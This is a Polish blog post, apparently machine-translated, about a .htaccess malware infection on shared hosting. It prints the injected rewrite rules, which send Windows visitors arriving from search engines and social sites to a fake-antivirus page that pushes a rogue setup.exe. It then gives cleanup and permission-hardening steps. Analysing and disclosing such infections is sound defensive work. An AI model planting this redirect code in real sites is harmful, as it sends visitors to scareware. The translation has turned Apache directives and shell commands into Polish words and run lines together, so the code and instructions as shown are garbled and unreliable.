Złośliwe oprogramowanie/wirus – .htaccess "rewrite" & przeadresować
Złośliwe oprogramowanie/wirus – .htaccess "rewrite" & przeadresować
Nowa forma wirusa o którym widzę, że niewiele wiadomo, dotyczy to witryn hostowanych na niewiarygodne serwery gdzie mogą to być konta użytkowników/konta subdomen “Widzieć” między nimi. Dokładniej, wszystkie konta hostingowe są umieszczone w folderze “vhosty“oraz prawa autorskie do folderze użytkownika Z “vhosty” jest on przekazywany zwykłemu użytkownikowi… w większości sytuacji sprzedawcą. Jest to typowa metoda serwerów WWW, z której nie korzystamy WHM/cPanel.
treść
Działanie wirusa .htaccess – .htaccess hack
wirus mieć wpływ na pliki .htaccess strony ofiary. Dodano linie / dyrektywa do którego przekierowywać gości (pochodzą z witryn i portali o dużym ruchu Yahoo, MSN, Google, Facebook, Yaindex, Twitter, Myspace itp.) do niektórych witryn oferujących “rozwiązania antywirusowe“. Chodzi o fałszywe rozwiązania antywirusowe, o którym pisałem we wstępie z Fałszywy program do usuwania wirusów.
Oto jak wygląda jeden z nich .htaccess dotknięty: (nie otwieraj adresów URL podanych w treści wierszy poniżej)
ErrorDocument 500 hxxp://wwww.peorianaczyniowesurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
Dokument błędu 502 hxxp://wwww.peorianaczyniowesurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
Dokument błędu 403 hxxp://wwww.peorianaczyniowesurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3Przepisz silnik włączony
PrzepiszWarunek %{HTTP_REFERER} .*yandex.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*rambler.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*tube.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*wikipedia.*$[NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*blogger.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*baidu.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*qq.com.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*myspace.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*twitter.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*facebook.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*google.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*na żywo.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*aol.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*bing.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*msn.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*amazon.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*ebay.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*flickr.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*soso.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*podwójne kliknięcie.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*orkut.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*dziennik na żywo.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*zapytaj.*$ [NC, LUB]
PrzepiszWarunek %{HTTP_REFERER} .*excite.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*altavista.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*msn.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*netscape.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*goto.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*wyszukiwanie informacji.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*mamma.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*lycos.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*szukaj.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*mail.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*dogpile.*$ [NC]PrzepiszCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* hxxp://wwww.peorianaczyniowesurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=r [R,L]Przepisz warunek %{REQUEST_FILENAME} !-f
Przepisz warunek %{REQUEST_FILENAME} !-d
PrzepiszWarunek %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
PrzepiszCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* hxxp://wwww.peorianaczyniowesurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=4 [R,L]
Osoby korzystające z WordPressa znajdą te linie w pliku .htaccess Z publiczny_html. Ponadto wirus tworzy w folderze identyczny plik .htaccess zawartość wp.
*Zdarzają się również sytuacje, w których zamiast peorianaczyniowesurgery.com pojawia się dns.thesoulfoodcafe.com lub inne adresy.
Co robi ten wirus?
Po przekierowaniu odwiedzający jest witany z otwartymi ramionami komunikatem:
Ostrzeżenie!
Na Twoim komputerze występują różne oznaki obecności wirusów i złośliwego oprogramowania. Twój system wymaga natychmiastowego sprawdzenia antywirusa!
Bezpieczeństwo systemu wykona szybkie i bezpłatne skanowanie Twojego komputera w poszukiwaniu wirusów i złośliwych programów.

Niezależnie od tego, który przycisk naciśniemy, zostaniemy przeniesieni na stronę “Mój komputer“, stworzony do naśladowania projekt XP. Tutaj zaczyna się automatycznie “Proces skanowania”, na końcu którego to odkrywamy “jesteśmy zarażeni”.

Po naciśnięciu OK lub Anuluj rozpocznie się pobieraćpliku setup.exe. Ten setup.exe to fałszywy program antywirusowy co wpływa na system. Zainstaluje szereg szkodliwych aplikacji, które będą dalej rozprzestrzeniać zainfekowane linki, a oprócz tego: oprogramowanie antywirusowe (również fałszywy), do zakupu którego ofiara jest proszona.
Mogą z niego skorzystać osoby, które już zetknęły się z tą formą wirusa Fałszywy program do usuwania wirusów. Zalecane jest również przeskanowanie całego dysku twardego. polecić Kaspersky Internet Security Lub Kaspersky antywirus.
Ta forma wirusa atakuje systemy operacyjne osób posiadających systemy operacyjne Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 i Windows 95. Jak dotąd nie są znane żadne przypadki infekcji systemów operacyjnych Windows Vista i Windows 7.
Jak możemy usunąć tego wirusa .htaccess z serwera i jak możemy zapobiec infekcji.
1. Analiza plików i usuwanie podejrzanych kodów. Aby mieć pewność, że problem dotyczy nie tylko pliku .htaccess dobrze jest analizujemy wszystkie pliki .php i .js.
2. Przepisujemy plik .htaccess i ustawiamy go chmod 644 Lub 744 z włączonymi tylko prawami zapisu użytkownik-ul właściciel.
3. Podczas tworzenia konta hostingowego dla witryny w folderze /dom Lub /webroot automatycznie zostanie utworzony folder, który zwykle zawiera nazwę użytkownika (użytkownik cpanelu, ftpitp.). Aby zapobiec zapisywaniu danych i przenoszeniu wirusów z jednego użytkownika na drugiego, zaleca się ustawienie dla każdego folderu użytkownika:
chmod 644 lub 744, 755 – wskazane jest 644.
chown -R użytkownik_numer_folder_numer.
chgrp -R numer_użytkownika numer_folderu
jest -wszystko aby sprawdzić, czy tryby zostały ustawione prawidłowo. Powinno pojawić się coś takiego:
drwx–X–x 12 dynamika dynamika 4096 6 maja 14:51 dynamika/
drwx–X–x 10 duran duran 4096 7 marca 07:46 duran/
drwx–X–x 12 probówek probówki 4096 29 stycznia 11:23 probówki/
drwxr-xr-x 14 express express 4096 26 lutego 2009 express/
drwxr-xr-x 9 te te 4096 19 maja 01:09 te/
drwx–X–x 9 gospodarstwo gospodarstwo 4096 19 grudnia 22:29 gospodarstwo/
Jeśli jeden z powyższych użytkowników będzie miał FTP zainfekowane pliki, nie będzie mógł wysłać wirusa do innego hostowanego użytkownika. Jest to minimalny środek bezpieczeństwa chroniący konta hostowane na serwerze internetowym.
Typowe elementy domen dotkniętych tym typem wirusa.
Wszystkie domeny, których to dotyczy, przekierowują odwiedzających do witryn zawierających nazwę domeny “/main.php?e=4&H“.
Ten “wirus .htaccess” wpływa na każdy typ CMS-a (Joomla, WordPress, phpBBitp.), który używa .htaccess.
Hakowanie wirusa .htaccess & Przeadresować.
Złośliwe oprogramowanie/wirus – .htaccess "rewrite" & przeadresować
Co nowego
O Stealth L.P.
Założyciel i redaktor Stealth Settings, din 2006 pana in prezent. Experienta pe sistemele de operare Linux (in special CentOS), Mac OS X , Windows XP > Windows 10 SI WordPress (CMS).
Zobacz wszystkie posty Stealth L.P.Może zainteresują Cię także...
3 przemyślenia na temat “Złośliwe oprogramowanie/wirus – .htaccess "rewrite" & przeadresować”